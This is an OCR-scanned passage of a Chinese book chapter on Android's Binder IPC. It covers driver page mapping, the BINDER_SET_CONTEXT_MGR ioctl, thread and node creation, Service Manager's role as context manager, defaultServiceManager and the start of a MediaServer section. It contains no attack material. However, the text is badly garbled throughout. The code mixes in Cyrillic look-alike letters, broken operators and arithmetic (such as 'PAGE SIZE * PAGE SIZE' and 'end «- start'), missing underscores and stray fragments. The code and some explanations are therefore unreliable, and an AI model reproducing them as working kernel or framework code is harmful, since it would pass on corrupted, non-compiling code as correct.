binder buffer 借助 变量 rb. node 来 到 struct binder proc 中 的 free buffers 表示 的 红 黑 树 中 。 而 那些 正在 使 用 的 
binder_buffer， 通 过 成 员 变量 tb_node 连 入 到 binder proc 中 的 allocated_buffers 表示 的 红 黑 树 中 。 这 样 做 是 
为 了 方便 查询 和 维护 这 块 地 址 空间 。 

继续 分 析 函 数 binder update page_range(), 看 一 下 Binder 驱动 程序 是 如 何 实现 把 一 个 物理 页 面 同时 映射 
到 内 核 空 间 和 进程 空间 去 的 。 具 体 实现 代码 如 下 所 示 。 


e 
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static int binder update page range(struct binder proc *proc, int allocate, 


{ 


void *start, void *end, struct vm area struct *vma) 


void *page addr; 
unsigned long user page addr; 
struct vm struct tmp area; 
struct page **page; 
struct mm struct *mm; 
if (binder debug mask & BINDER DEBUG BUFFER ALLOC) 
printk(KERN INFO "binder: %d: %s pages %р-%р\п", 
proc-»pid, allocate ? "allocate" : "free", start, end); 
if (end «- start) 
return 0; 
if (ута) 
mm = NULL; 
else 
mm = get task mm(proc-^tsk); 
if (mm) ( 
down write(&mm-»mmap sem); 
ута = proc->vma; 
} 
if (allocate == 0) 
goto free_range; 
if (vma == NULL) { 
printk(KERN_ERR "binder: %d: binder_alloc_buf failed to " 
"map pages in userspace, no vma\n", proc->pid); 
goto err_no_vma; 
} 
for (page_addr = start; page addr < end; page addr += PAGE_SIZE) { 
int ret; 
struct page **page array ptr; 
page = &ргос->радеѕ[(раде addr- proc->buffer) / PAGE SIZE]; 
BUG ON('page); 
*page = alloc page(GFP. KERNEL| __ СЕР ZERO); 
if (page == NULL) ( 
printK(KERN ERR "binder: %d: binder alloc buf failed " 
"for page at %р\п", proc->pid, page addr); 
goto err alloc page failed; 
) 
tmp area.addr = page addr; 
tmp area.size - PAGE SIZE * PAGE SIZE /* guard page? */; 
page array ptr = page; 
ret map vm area(&tmp area, PAGE KERNEL, &page array ptr); 
if (ret) { 
printk(KERN ERR "binder: %d: binder alloc buf failed " 
"to map page at %p in kerneln", 
proc->pid, page addr); 
goto err map kernel failed; 
) 
user page addr = 
(uintptr t)page addr + ргос->иѕег buffer offset; 
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ret = vm insert page(vma, user page addr, раде[0]); 
if (ret) ( 
printK(KERN ERR "binder: %d: binder alloc buf failed " 
"to map page at %lx in userspace\n", 
proc-»pid, user page addr); 
goto err vm insert page failed; 


} 
/* vm_insert_page does not seem to increment the refcount */ 
} 
if (mm) { 
up_write(&mm->mmap_sem); 
mmput(mm); 
} 
return 0; 
free_range: 


for (page_addr = end - PAGE SIZE; page addr >= start; 
page addr-- PAGE SIZE)( 
page = &ргос->радеѕ[(раде адаг - proc->buffer) / PAGE SIZE]; 
if (ута) 
гар page range(vma, (uintptr раде адаг + 
proc->user_buffer_offset, PAGE SIZE, NULL); 
err vm insert page failed: 
unmap kernel range((unsigned long)page addr, PAGE SIZE); 
err map kernel failed: 
. free page(*page); 
*page = NULL; 
err alloc page failed: 


} 
err no vma: 
if (mm) { 
up_write(&mm->mmap_sem); 
mmput(mm); 
} 
return -ENOMEM; 


} 
通过 上 述 代码 不 但 可 以 分 配 物理 页 面 ， 而 且 可 以 释放 物理 页 面 ， 这 可 以 通过 参数 allocate 来 区 别 ， 在 此 
只 需 关 注 分 配 物理 页 面 的 情况 。 要 分 配 物理 页 面 的 虚拟 地 址 空间 范围 为 (start ~ епа), 函数 前 面 的 一 些 检查 风 
辑 就 不 看 了 ， 只 需 直 接 看 中 间 的 for 循环 即 可 ， 这 段 for 循环 的 具体 运作 流程 如 下 所 示 。 
(1) 调用 alloc_page() 分 配 一 个 物理 页 面 ， 此 函数 返回 一 个 结构 体 page 物理 页 面 描述 符 ， 根 据 这 个 描 
述 的 内 容 初始 化 结构 体 vm struct tmp area. 
(2) 通过 map_vm_area() 将 这 个 物理 页 面 插入 到 tmp. area 描述 的 内 核 空间 。 
(3) 通过 page_addr + proc->user_buffer_offset 获得 进程 虚拟 空间 地 址 。 
(4) 通过 函数 vm_insert_page0 将 这 个 物理 页 面 插入 到 进程 地 址 空间 ， 参 数 ута 表示 要 插入 的 进程 的 
地 址 空间 。 
for (page_addr = start; page addr < end; page_addr += PAGE SIZE) { 
int ret; 
struct page **page array ptr; 
page = &proc->pages[(page_addr - proc->buffer) / PAGE SIZE]; 


e. 
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BUG ON(*page); 
*page = alloc page(GFP KERNEL| GFP ZERO); 
if (page == NULL) { 
printK(KERN ERR "binder: %d: binder alloc buf failed " 
"for page at %р\п", proc->pid, page addr); 
goto err alloc page failed; 
} 
tmp_area.addr = page_addr; 
tmp_area.size = PAGE_SIZE + PAGE_SIZE /* guard page? */; 
page array ріг = page; 
ret = map vm area(&tmp area, PAGE KERNEL, &page array ptr); 
if (ret) ( 
printK(KERN ERR "binder: %d: binder alloc buf failed " 
"to map page at %p in kernel\n", 
proc-»pid, page addr); 
goto err map kernel failed; 
} 
user_page_addr = 
(uintptr_t)page_addr + proc->user_buffer_offset; 
ret = vm insert page(vma, user page адаг, раде[0]); 
if (ret) ( 
printkK(KERN ERR "binder: %d: binder alloc buf failed " 
"to map page at %lx in userspace\n", 
ргос->ріа, user page addr); 
goto err vm insert page failed; 


) 
4.5.6 ”保护 进程 


再 次 回 到 文件 frameworks/base/cmds/servicemanager/service_manager.c 中 的 main() 函 数 , 接 下 来 需要 调用 
binder become context manager 来 通知 Binder 驱动 程序 自己 是 Binder 机 制 的 上 下 文 管理 者 ， 即 保护 进程 。 
函数 binder_become_context_manager() 在 文件 frameworks/base/cmds/servicemanager/binder.c 中 定义 ， 具 体 代 
人 码 如 下 所 示 。 

int binder become context manager(struct binder state *bs){ 

return ioctl(bs-»fd, BINDER. SET CONTEXT MGR, 0); 


} 
在 此 通过 调用 ioctl 文件 操作 函数 通知 Binder 驱动 程序 自己 是 保护 进程 ， 命 令 号 是 BINDER_SET_ 
CONTEXT MGR， 并 没有 任何 参数 。BINDER_SET_CONTEXT MGR 定义 为 : 
#define BINDER SET CONTEXT MGR _IOW('b', 7, int) 
这 样 就 进入 到 Binder 驱动 程序 的 函数 binder ioctl()， 在 此 只 关注 如 下 BINDER SET CONTEXT MGR 
命令 即 可 。 
static long binder ioctl(struct file *filp, unsigned int cmd, unsigned long arg) 
t 
int ret; 
struct binder proc *proc = filp->private data; 
struct binder thread *thread; 
unsigned int size = ІОС SIZE(cmd); 
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err: 


void _ user *ubuf = (void _ user *)arg; 
/*printk(KERN_INFO "binder ioctl: %d:%d %x %lx\n", proc->pid, current->pid, cmd, arg);*/ 
ret = wait event interruptible(binder user error wait, binder stop on user error « 2); 
if (ret) 
return ret; 
mutex lock(&binder lock); 
thread = binder get thread(proc); 
if (thread == NULL) { 


ret = -ENOMEM; 
goto err; 
} 


switch (cmd) { 
case BINDER_SET_CONTEXT_MGR: 
if (binder_context_mgr_node != NULL) { 
printk(KERN_ERR "binder: BINDER_SET_CONTEXT_MGR already set\n"); 
ret = -EBUSY; 
goto err; 
} 
if (binder_context_mgr_uid != -1) { 
if (binder_context_mgr_uid != current->cred->euid) { 
printk(KERN_ERR "binder: BINDER_SET_" 
"CONTEXT MGR bad uid %d != %d\n", 
current->cred->euid, 
binder_context_mgr_uid); 
ret = -EPERM; 
goto err; 
} 
) else 
binder context mgr uid = current->cred->euid; 
binder context mgr node = binder new node(proc, NULL, NULL); 
if (binder context mgr node == NULL) ( 
ret = -ENOMEM; 
goto err; 
) 
binder context mgr node--local weak refs; 
binder context mgr node--local strong refs; 
binder context mgr node-^has strong ref = 1; 
binder context mgr node-^has weak ref = 1; 
break; 
default: 
ret = -EINVAL; 
goto err; 
) 


ret = 0; 


if (thread) 
thread->looper &- -BINDER LOOPER STATE NEED RETURN; 
mutex unlock(&binder lock); 
wait event interruptible(binder user error wait, binder stop on user error « 2); 
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if (ret && ret != -ERESTARTSYS) 
printk(KERN INFO "binder: %d:%d ioctl %x %lx returned %d\n", proc-»pid, current->pid, cmd, arg, ret); 
return ret; 

} 

在 分 析 函 数 binder_ioctl() 之 前 ， 需 要 先 弄 明白 如 下 两 个 数据 结构 。 

O 结构 体 binder thread: 表示 一 个 线程 ， 这 里 就 是 执行 binder become_context_manager() 函 数 的 线程 。 
在 此 结构 中 ，proc 表 示 这 个 线程 所 属 的 进程 。 结 构 体 binder_proc 中 成 员 变量 thread 的 类 型 是 rb_root， 
表示 一 义 红 黑 树 ， 把 属于 这 个 进程 的 所 有 线程 都 组 织 起 来 ， 结 构 体 binder_thread 的 成 员 变 量 rb_node 
用 于 链接 这 棵 红 黑 树 的 节点 。 

Struct binder thread ( 

struct binder proc *proc; 

struct rb node rb node; 

int pid; 

int looper; 

struct binder transaction *transaction stack; 

struct list head todo; 

uint32 t return error; /* Write failed, return error code in read buf */ 

uint32 t return error2; /* Write failed, return error code in read */ 
/* buffer. Used when sending a reply to a dead process that */ 
/* we are also waiting on */ 

wait queue head t wait; 

struct binder stats stats; 


X 

在 上 述 代码 中 ，looper 成 员 变 量 表示 线程 的 状态 ， 可 以 取 下 面 的 值 。 

enum { 
BINDER_LOOPER_STATE_REGISTERED = 0x01, 
BINDER_LOOPER_STATE_ENTERED = 0x02, 
BINDER_LOOPER_STATE_EXITED = 0x04, 
BINDER_LOOPER_STATE_INVALID = 0x08, 
BINDER_LOOPER_STATE_WAITING = 0x10, 
BINDER_LOOPER_STATE_NEED_RETURN = 0x20 

y 


另外 ，transaction_stack 表示 线程 正在 处 理 的 事务 ，todo 表示 发 往 该 线程 的 数据 列表 ，return_error 和 
return_error2 表示 操作 结果 返回 码 ，wait 用 来 阻塞 线程 等 待 某 个 事件 的 发 生 ，stats 用 来 保存 一 些 统计 信息 。 
关于 各 成 员 变量 ， 遇 到 时 再 分 析 其 作用 。 

О 数据 结构 binder node: 表示 一 个 binder 实 体 ， 定 义 如 下 所 示 。 

struct binder_node { 

int debug id; 
struct binder work work; 
union { 
struct rb_node rb node; 
struct hlist node dead node; 
k 
struct binder proc *proc; 
struct hlist head refs; 
int internal strong refs; 
intlocal weak refs; 
intlocal strong refs; 
void — user “ptr; 
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void _ user *cookie; 
unsigned has strong ref : 1; 
unsigned pending strong ref: 1; 
unsigned has weak ref : 1; 
unsigned pending weak ref: 1; 
unsigned has async transaction : 1; 
unsigned accept fds : 1; 
int min priority : 8; 
struct list head async todo; 
} 
这 样 ，rb_node 和 dead node 组 成 了 一 个 联合 体 ， 有 具体 来 说 分 为 如 下 两 种 情形 。 
O 如 果 这 个 Binder 实 体 还 在 正常 使 用 , 则 使 用 rb_node 来 连 入 proc->nodes 所 表示 的 红 黑 树 的 节点 ， 这 棵 
红 黑 树 用 来 组 织 属 于 这 个 进程 的 所 有 Binder 实 体 。 
O 如 果 这 个 Binder 实 体 所 属 的 进程 已 经 销毁 ， 而 这 个 Binder 实 体 又 被 其 他 进程 所 引用 ， 则 这 个 Binder 
实体 通过 dead_node 进 入 到 一 个 哈 希 表 中 存放 。proc 成 员 变 量 表示 这 个 Binder 实 例 所 属 进程 。 
refs 成 员 变量 把 所 有 引用 了 该 Binder 实体 的 Binder 引用 连接 起 来 构成 一 个 链表 。internal_strong_refs、 
local weak refs 和 local strong refs 表示 这 个 Binder 实体 的 引用 计数 。ptr 和 cookie 成 员 变量 分 别 表示 这 个 
Binder 实体 在 用 户 空 间 的 地 址 以 及 附加 数据 。 其 余 的 成 员 变量 就 不 描述 了 ， 遇 到 时 再 分 析 。 


4.5.7 ”获得 线程 信息 


接 下 来 回 到 函数 binder_ioctl() 中 ,首先 是 通过 filp->private_data 获得 proc 变量 ,此 处 的 函数 binder_mmap() 
是 一 样 的 ， 然 后 通过 函数 binder_get_thread() 获 得 线程 信息 ， 把 当前 线程 current 的 pid 作为 键 值 ， 在 进程 
proc->threads 表示 的 红 黑 树 中 进行 查找 , 看 是 否 已 经 为 当前 线程 创建 过 了 binder thread 信息 ,在 这 个 场景 下 ， 
由 于 当前 线程 是 第 一 次 进 到 这 里 ， 所 以 肯定 找 不 到 ， 即 *p == NULL RY, 于是， 就 为 当前 线程 创建 一 个 线 
程 上 下 文 信息 结构 体 binder_thread， 并 初始 化 相应 成 员 变量 ,并 插入 到 proc->threads 所 表示 的 红 黑 树 中 ， 下 
次 要 使 用 时 就 可 以 从 proc 中 找到 了 。 注 意 ， 这 里 的 thread->looper = BINDER LOOPER STATE 
NEED_RETURN。 函 数 binder get thread0) 的 具体 代码 如 下 所 示 。 

static struct binder_thread *binder_get_thread(struct binder_proc *proc) 

{ 


struct binder_thread *thread = NULL; 
struct rb_node *parent = NULL; 
struct rb_node **p = &proc->threads.rb_node; 


while (*p) ( 
parent = *p; 
thread = rb entry(parent, struct binder thread, rb node); 


if (current->pid < thread->pid) 
р = &(*р)->гЬ left; 
else if (current->pid > thread->pid) 
p = &(*p)-?rb right; 
else 
break; 
} 
if (^p == NULL) { 
thread = kzalloc(sizeof(*thread), GFP_KERNEL); 
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if (thread == NULL) 

return NULL; 
binder_stats.obj_created[BINDER_STAT_THREAD}++; 
thread->proc = proc; 
thread->pid = current->pid; 
init_waitqueue_head(&thread->wait); 
INIT_LIST_HEAD(&thread->todo); 
tb_link_node(&thread->rb_node, parent, p); 
rb_insert_color(&thread->rb_node, &proc->threads); 
thread->looper |= BINDER LOOPER STATE NEED RETURN; 
thread-»return error = BR OK; 
thread-»return error2 = BR OK; 


} 
return thread; 
} 
再 回 到 函数 binder_ioctl() 中 , 接 下 来 会 有 两 个 全 局 变量 binder context mgr node 和 binder_context_mgr_ 
uid， 定 义 如 下 。 


static struct binder_node *binder_context mgr_node; 

static uid t binder context mgr uid = -1; 

HB, binder context тег node 用 来 表示 Service Manager 90, binder context mgr uid 表示 Service 
Manager 保护 进程 的 uid。 在 这 个 场景 下 ， 由 于 当前 线程 是 第 一 次 进 到 这 里 ， 所 以 binder context mgr 1 mone 


7j NULL, binder context mgr uid 为 -1， 于 是 初始 化 binder context mgr uid 为 current->cred->euid, 3X 
前 线程 就 成 为 Binder 机 制 的 保护 进程 了 ， 并 且 通 过 binder пем node 为 Service Manager 创建 Binder 实体 。 
static struct binder node * 
binder new node(struct binder proc *proc, void — user *ptr, void _ user *cookie) 


{ 


struct rb node **p = &proc-»nodes.rb node; 
struct rb node *parent = NULL; 
struct binder node *node; 
while (*p) ( 
parent = *p; 
node 7 rb entry(parent, struct binder node, rb node); 
if (ptr < node->ptr) 
p = &(*р)->гЫ left; 
else if (ptr > node->ptr) 
p = &(*p)-?rb right; 
else 
return NULL; 
} 
node = kzalloc(sizeof(*node), GFP_KERNEL); 
if (node == NULL) 
return NULL; 
binder_stats.obj_created[BINDER_STAT_NODE]++; 
rb_link_node(&node->rb_node, parent, p); 
rb_insert_color(&node->rb_node, &proc->nodes); 
node->debug_id = ++binder last id; 
node->proc = proc; 
node->ptr = ptr; 
node->cookie = cookie; 
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node->work.type = BINDER_WORK_NODE; 
INIT_LIST_HEAD(&node->work.entry); 
INIT LIST HEAD(&node->async todo); 
if (binder debug mask & BINDER DEBUG INTERNAL REFS) 
printK(KERN INFO "binder: %d:%d node %а и%р c%p created\n", 
proc->pid, current->pid, node->debug id, 
node->ptr, node->cookie); 
return node; 


} 

在 这 里 传 进来 的 ptr 和 cookie 都 为 NULL。 上 述 函 数 会 首先 检查 proc->nodes 红 黑 树 中 是 否 已 经 存在 以 
ptr 为 键 值 的 node， 如 果 已 经 存在 则 返回 NULL。 在 这 个 场景 下 ， 由 于 当前 线程 是 第 一 次 进入 到 这 里 ， 所 以 
肯定 不 存在 ， 于 是 就 新 建 了 一 个 ptr Jy NULL 的 binder_node， 初 始 化 其 他 成 员 变 量 ， 并 插入 到 proc->nodes 
红 黑 树 中 去 。 

当 binder new. node 返回 到 函数 binder_ioctl0 后 ， 会 把 新 建 的 binder_node 指针 保存 在 binder context mgr node 
中 ， 然 后 又 初始 化 binder context mgr node 的 引用 计数 值 ，BINDER_SET_CONTEXT_MGR 命令 执行 完毕 ， 在 
函数 binder ioctl0 返 回 之 前 执行 下 面 的 语句 。 

if (thread) 

thread->looper &= -BINDER LOOPER STATE NEED RETURN; 


4.5.8 在 循环 中 等 待 Client 发 送 请 求 


再 次 回 到 文件 frameworks/base/cmds/servicemanager/service manager.c 中 的 main() 函 数 , 接 下 来 需要 调用 
函数 binder loop0 进 入 循环 ， 等 待 Client 发 送 请 求 。 函 数 binder loop0 定 义 在 文件 frameworks/base/cmds/ 
servicemanager/binder.c 中 。 

void binder loop(struct binder state *bs, binder handler func) 

{ 

int res; 

struct binder_write_read bwr; 
unsigned readbuf[32]; 
bwr.write_size = 0; 
bwr.write_consumed = 0; 
bwr.write_buffer = 0; 


readbuf[0] = BC_ENTER_LOOPER; 
binder_write(bs, readbuf, sizeof(unsigned)); 
for (;;) { 
bwr.read_size = sizeof(readbuf); 
bwr.read_consumed = 0; 
bwr.read buffer = (unsigned) readbuf; 
res = ioctl(bs->fd, BINDER WRITE READ, &bwr); 


if (res « 0) ( 
LOGE("binder loop: ioctl failed (%s)\n", strerror(errno)); 
break; 
} 
res = binder_parse(bs, 0, readbuf, bwr.read_consumed, func); 
if (res == 0) { 
LOGE("binder_loop: unexpected reply?!\n"); 
break; 
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if (res < 0) ( 
LOGE("binder loop: io error %d %s\n", res, strerror(errno)); 
break; 

} 


} 

) 

在 上 述 代 码 中 ， 首 先 通过 函数 binder write() 执 行 BC ENTER. LOOPER 命令 以 告诉 Binder 驱动 程序 
Service Manager 马上 要 进入 循环 。 在 此 还 需要 理解 设备 文件 /dewbinder 操作 函数 ioctlO 的 操作 码 BINDER_ 
WRITE READ， 首 先 看 其 定义 。 

#define BINDER_WRITE_READ_IOWR('b', 1, struct binder_write_read) 

此 io 操作 码 有 一 个 形式 为 struct binder. write read 的 参数 : 

struct binder write read ( 


signed long write size; /* bytes to write */ 

signed long write consumed; /* bytes consumed by driver */ 
unsigned long write buffer; 

signed long read size; /* bytes to read */ 

signed long read consumed; /* bytes consumed by driver */ 


unsigned long read buffer; 
X 
用 户 空间 程序 和 Binder 驱动 程序 交互 时 ， 大 多 数 是 通过 BINDER WRITE READ 命令 实现 的 ， 
write buffer 和 read buffer 所 指向 的 数据 结构 还 指定 了 有 具体 要 执行 的 操作 , write buffer 和 read buffer 所 指向 
的 结构 体 是 binder _ transaction_data， 定 义 此 结构 体 的 代码 如 下 所 示 。 
Struct binder transaction data ( 
/* The first two are only used for bCTRANSACTION and brTRANSACTION, 


* identifying the target and contents of the transaction. 
Vif 


union { 
size thandle; /* target descriptor of command transaction */ 
void *ptr; /* target descriptor of return transaction */ 

) target; 

Void *cookie; /* target object cookie */ 

unsigned int code; /* transaction command */ 


/* General information about the transaction. */ 
unsigned int flags; 
pid t sender pid; 
uid t sender euid; 
size tdata size; /* number of bytes of data */ 
size t offsets size; /* number of bytes of offsets */ 
union í 
struct ( 
/* transaction data */ 
const void *buffer; 
/* offsets from buffer to flat binder object structs */ 
const void *offsets; 
) ptr; 
uint8 t buf[8]; 
) data; 
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到 此 为 止 ， 已 从 源 代码 一 步 一 步 地 分 析 完 Service Manager 是 如 何 成 为 Android 进程 间 通 信 CPC) 机 制 
Binder 保护 进程 的 。 在 接 下 来 的 内 容 中 ， 简 要 总 结 Service Manager 成 为 Android 进程 间 通 信 APC) 机 制 
Binder 保护 进程 的 过 程 。 

(1) 打开 /dev/binder 文件 
open("/dev/binder", O_RDWR); 

(2) 建立 128K 内 存 映 射 

mmap(NULL, mapsize, PROT READ, MAP PRIVATE, bs->fd, 0); 
(3) 通知 Binder 驱动 程序 它 是 保护 进程 

binder become context manager(bs); 

(4) 进入 循环 等 待 请 求 

binder loop(bs, svcmgr handler); 

在 这 个 过 程 中 ， 在 Binder 驱动 程序 中 建立 了 一 个 struct binder proc 结构 、 一 个 struct binder thread 结构 
和 一 个 struct binder_node 结构 ， 这 样 ，Service Manager 就 在 Android 系统 的 进程 间 通 信 机 制 Binder 中 担负 
起 保护 进程 的 职责 。 


4.5.9 Service Manager 服务 保护 进程 


众所周知 ，Service Manager 在 Binder 机 制 中 既 充当 保护 进程 的 角色 ， 同 时 也 充当 着 Server 角色 ， 但 是 
它 又 与 一 般 的 Server 不 一 样 。 对 于 普通 的 Server 来 说 ，Client 如 果 想 要 获得 Server 的 远程 接口 ， 必 须 通 过 
Service Manager 远程 接口 提供 的 getService 接口 来 获得 ， 这 本 身 就 是 一 个 使 用 Binder 机 制 来 进行 进程 间 通 
信和 的 过 程 。 而 对 于 Service Manager 这 个 Server 来 说 ，Client 如 果 想 要 获得 Service Manager 远程 接口 ， 却 不 
必 通 过 进程 间 通 信 机 制 来 获得 ， 因 为 Service Manager 远程 接口 是 一 个 特殊 的 Binder 引用 ， 其 引用 句柄 一 定 
是 0。 

获取 Service Manager 远程 接口 的 函数 是 defaultServiceManager()， 此 函数 声明 在 文件 frameworks/ 
base/include/binder/IServiceManager.h 中 ， 代 码 如 下 : 

sp<lServiceManager> defaultServiceManager(); 

函数 defaultServiceManager() 在 文件 frameworks/base/libs/binder/IServiceManager.cpp 中 实现 , 具体 代码 如 

下 所 示 。 
sp«IServiceManager? defaultServiceManager() 


if (gDefaultServiceManager != NULL) return gDefaultServiceManager; 


{ 

AutoMutex l(gDefaultServiceManagerLock); 

if (gDefaultServiceManager == NULL) { 

gDefaultServiceManager = interface_cast<IServiceManager>( 
ProcessState::self()->getContextObject(NULL)); 

j 
} 
return gDefaultServiceManager; 


} 

其 中 ，gDefaultServiceManagerLock 和 gDefaultServiceManager 是 全 局 变量 ， 在 文件 frameworks/base/ 
libs/binder/Static.cpp 中 定义 ， 具 体 代码 如 下 所 示 。 

Mutex gDefaultServiceManagerLock; 

sp<IServiceManager> gDefaultServiceManager; 

从 上 述 函数 可 以 看 出 ，gDefaultServiceManager 是 单 例 模式 ， 在 调用 函数 defaultServiceManager0 时 ， 如 
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果 已 经 创建 gDefaultServiceManager 了 则 直接 返回 ， 和 否则 通过 interface cast<IServiceManager>(Process- 
State::self()->getContextObject(NULL)) 创 建 一 个 ， 并 保存 在 全 局 变量 gDefaultServiceManager 中 。 
在 Binder 机 制 中 ， 类 BpServiceManager 继承 了 类 Bplnterface<IServiceManager>, Bplnterface 是 一 个 模 
板 类 ， 在 文件 frameworks/base/include/binder/IInterface.h 中 定义 ， 具 体 代 码 如 下 所 示 。 
template<typename INTERFACE> 
class Bplnterface : public INTERFACE, public BpRefBase { 
public: 
Bpinterface(const sp«IBinder»& remote); 
protected: 
virtual IBinder* onAsBinder(); 


X 
类 IServiceManager 继承 了 类 IInterface， 而 类 Interface 和 类 BpRefBase 又 分 别 继承 了 类 RefBase. 
下 面 是 创建 Service Manager 远程 接口 的 主要 语句 : 
gDefaultServiceManager = interface_cast<IServiceManager>( 
ProcessState::self()->getContextObject(NULL)); 

在 上 述 代 码 中 ， 首 先 调用 了 函数 ProcessState::self， 此 函数 是 ProcessState 的 静态 成 员 函 数 ， 功 能 是 返回 

-个 全 局 唯一 的 ProcessState 实例 变量 ， 其 实 这 就 是 单 例 模式 ， 此 变量 名 为 gProcess。 如 果 未 创建 gProcess 

则 执行 创建 操作 。 在 ProcessState 的 构造 函数 中 , 通过 文件 操作 函数 open() 打 开设 备 文件 /dev/binder,， 并 且 返 
回来 的 设备 文件 描述 符 保存 在 成 员 变量 mDriverFD 中 。 

接着 调用 函数 gProcess->getContextObject() 获 得 一 个 句柄 值 为 0 的 Binder 引用 BpBinder。 再 来 看 函数 
interface_cast<IServiceManager> 的 具体 实现 ， 此 模板 函数 在 文件 framework/base/include/binder/lInterface.h 中 
定义 ， 有 具体 实现 代码 如 下 所 示 。 

template<typename INTERFACE> 

inline sp<INTERFACE> interface cast(const sp<IBinder>& obj) ( 

return INTERFACE::asInterface(obj); 


} 

在 上 述 代码 中 ，INTERFACE 是 IServiceManager， 调 用 了 函数 IServiceManager::asInterface(). PR% 
IServiceManager::asInterface() 是 通过 DECLARE_META_INTERFACE(ServiceManager) 宏 在 类 IServiceManager 
中 声明 的 ， 位 于 文件 framework/base/include/binder/IServiceManager.h 中 ， 展 开 后 的 代码 如 下 所 示 。 

#define DECLARE META INTERFACE(ServiceManager) \ 

static const android::String16 descriptor; 

static android::sp<IServiceManager> asinterface( 

const android::sp<android::|Binder>& obj); 

virtual const android::String16& getlnterfaceDescriptor() const; 
IServiceManager(); 

virtual -IServiceManager(); 

IServiceManager::asInterface 是 通过 宏 IMPLEMENT META INTERFACE(ServiceManager, "android.os. 
JServiceManager") 定 义 的 , 位 于 文件 framework/base/libs/binder/IServiceManager.cpp 中 , 展开 后 的 代码 如 下 所 示 。 

#define IMPLEMENT META INTERFACE(ServiceManager, "android.os.IServiceManager") \ 

const android::String16 IServiceManager::descriptor("android.os.IServiceManager"); \ 

const android::String16& \ 
IServiceManager::getlnterfaceDescriptor() const { À 

return IServiceManager::descriptor; \ 
\ 

\ 

\ 


ee 


} 
android::sp<IServiceManager> IServiceManager::asInterface( 
const android::sp<android::|Binder>& obj) 
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android::sp<lServiceManager intr; 

if (obj = NULL) ( 

intr = static_cast<IServiceManager*>( 

obj-»queryLocallnterface( 

IServiceManager::descriptor).get()); 

if (intr == NULL) ( 

intr = new BpServiceManager(obj); 

} 

ij 

return intr; 

} 

IServiceManager::IServiceManager() { } 

IServiceManager::-IServiceManager() { } 
IServiceManager::asInterface 的 具体 实现 代码 如 下 所 示 。 
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android::sp<lServiceManager> IServiceManager::asInterface(const android::sp<android::IBinder>& obj) 


{ 


android::sp<IServiceManager> intr; 


if (obj != NULL) ( 
intr = static_cast<IServiceManager*>( 


obj->queryLocallnterface(IServiceManager::descriptor).get()); 


if (intr == NULL) ( 
intr = new BpServiceManager(obj); 
} 
} 


return intr; 


} 
此 处 传 进来 的 参数 obj 就 是 刚才 创建 的 new BpBinder(0), Ж BpBinder 中 的 成 员 函 数 queryLocalInterface() 
继承 自 基 类 IBinder， 函 数 IBinder::queryLocallInterface() 位 于 文件 framework/base/libs/binder/Binder.cpp 中 ， 


具体 实现 代码 如 下 所 示 。 


sp<linterface> IBinder::queryLocallnterface(const String16& descriptor) 


return NULL; 


) 

由 此 可 见 ， 在 函数 IServiceManager::asInterface() 中 会 调 上 
intr = new BpServiceManager(obj); 

Bp: 

intr = new BpServiceManager(new BpBinder(0)); 


下 面 的 语句 。 


创建 的 Service Manager 远程 接口 本 质 上 是 一 个 BpServiceManager, 包含 了 一 个 句柄 值 为 0 的 Binder 引用 。 


4.6 MediaServer 安全 


通信 机 制 分 析 


多 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 4 章 \MediaServer 安全 通信 机 制 分 析 .avi 
MediaServer (缩写 为 MS) 是 一 个 可 执行 程序 ，Server 是 系统 诸多 重要 Service 的 “理想 居所 ”， 主 要 


包括 如 下 服务 。 
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AudioFlinger: 音频 系统 中 的 核心 服务 。 
AudioPolicyService: 音频 系统 中 关于 音频 策略 的 重要 服务 。 
MediaPlayerService: 多 媒体 系统 中 的 重要 服务 。 
CameraService: 有 关 摄 像 /照相 的 重要 服务 。 
由 此 可 见 ，MS 除了 不 涉及 Surface 系统 外 ， 其 他 重要 的 服务 基本 上 都 涉及 了 。 在 本 节 将 以 MediaServer 
系统 为 例 ， 详 细 讲解 整个 Binder 系统 的 实现 流程 。 


4.6.1 MediaServer 的 入 口 函数 


oooo 


MediaServer 是 一 个 可 执行 程序 ， 在 如 下 文件 中 定义 。 
frameworks/av/media/mediaserver/main_mediaserver.cpp 
文件 main. mediaserver.cpp 的 入 口 函数 是 main()， 代 码 如 下 所 示 。 
int main(int argc, char** argv) 
{ 
signal(SIGPIPE, 516 IGN); 
sp<ProcessState> proc(ProcessState::self()); 
sp«IServiceManager» sm = defaultServiceManager(); 
ALOGI("ServiceManager: %p", sm.get()); 
AudioFlinger::instantiate(); 
MediaPlayerService::instantiate(); 
CameraService::instantiate(); 
AudioPolicyService::instantiate(); 
ProcessState::self()->startThreadPool(); 
IPCThreadState::self()-2joinThreadPool(); 


) 

上 述 代码 的 实现 流程 如 下 。 

获得 一 个 ProcessState 实 例 。 

调用 defaultServiceManager， 得 到 一 个 IServiceManager。 
初始 化 音频 系统 的 AudioFlinger 服 务 。 

实现 多 媒体 系统 的 MediaPlayer 服 务 ， 将 以 它 作为 主 切入 点 。 
实现 音频 系统 的 AudioPolicy 服 务 。 

创建 一 个 线程 池 。 

将 自己 加 入 到 刚才 的 线程 池 。 
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4.6.2 调用 ProcessState 


在 main0) 函 数 的 开始 处 便 调 用 了 ProcessState， 由 于 每 个 进程 只 有 一 个 ProcessState， 所 以 它 是 独一无二 
的 。 调 用 ProcessState 的 代码 如 下 所 示 。 

/| 获得 一 个 ProcessState 实例 

sp<ProcessState> proc(ProcessState::self()); 

函数 self0 在 如 下 文件 中 定义 。 

\frameworks\native\libs\binder\ProcessState.cpp 

函数 self0 的 实现 代码 如 下 所 示 。 

sp<ProcessState> ProcessState::self() 

{ 
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Mutex::Autolock l(gProcessMutex); 
if (gProcess != NULL) { 
return gProcess; 
} 
gProcess = new ProcessState; 
return gProcess; 
» 
在 上 述 代码 中 , selfO 函 数 采用 了 单 例 模式 ,根据 这 个 以 及 Process State 的 名 字 很 明确 地 传递 了 一 个 信息 : 
每 个 进程 只 有 一 个 ProcessState 对 象 。 
接 下 来 看 ProcessState 的 构造 函数 ， 功 能 是 打开 了 Binder 设备 。 此 函数 也 是 在 文件 ProcessState.cpp 中 
实现 ， 具 体 实现 代码 如 下 所 示 。 
ProcessState::ProcessState() 
: mDriverFD(open driver()) 
,mVMStart(MAP FAILED) 
, mManagesContexts(false) 
, mBinderContextCheckFunc(NULL) 
, mBinderContextUserData(NULL) 
, mThreadPoolStarted(false) 
, mThreadPoolSeq(1) 


if (mDriverFD >= 0) ( 
11 XXX Ideally, there should be a specific define for whether we 
1/ have ттар (or whether we could possibly have the kernel module 
11 availabla) 
